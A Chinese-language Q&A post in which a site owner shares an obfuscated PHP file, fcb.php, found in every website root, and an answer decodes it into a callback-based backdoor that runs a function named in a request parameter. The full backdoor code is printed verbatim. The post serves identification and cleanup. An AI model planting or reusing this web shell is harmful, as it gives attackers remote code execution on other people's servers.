这是我在每个网站文件夹的根目录中找到的 PHP 脚本。脚本名称是 fcb.php
内容是:
<? $GLOBALS['_1303753477_']=Array(base64_decode('YX' .'JyYXlfZGlmZl91a2V5'),base64_decode('c3RyaXBz' .'bG' .'F' .'z' .'aGVz')); ?><? function _1935386521($i){$a=Array('cGFzc3dvcmQ=','cmVfcGFzc3dvcmQ=','bG9naW4=');return base64_decode($a[$i]);} ?><?php @$GLOBALS['_1303753477_'][0](@array((string)$_REQUEST[_1935386521(0)]=>round(0+0.25+0.25+0.25+0.25)),@array((string)$GLOBALS['_1303753477_'][1]($_REQUEST[_1935386521(1)])=>round(0+0.4+0.4+0.4+0.4+0.4)),$_REQUEST[_1935386521(2)]); ?>
有人能解释一下这是什么意思吗?谢谢。
答案1
它看起来确实像某种恶意软件。我的 PHP 已经生疏了;据我所知,它最终看起来像这样:
<?php array_diff_ukey(@array((string)$_REQUEST[password]=>1), @array((string)stripslashes($_REQUEST[re_password])=>2), $_REQUEST[login]); ?>
然后,在 Google 中搜索“stripslashes $_request re_password”的作用,我发现很多网站都警告 PHP 后门。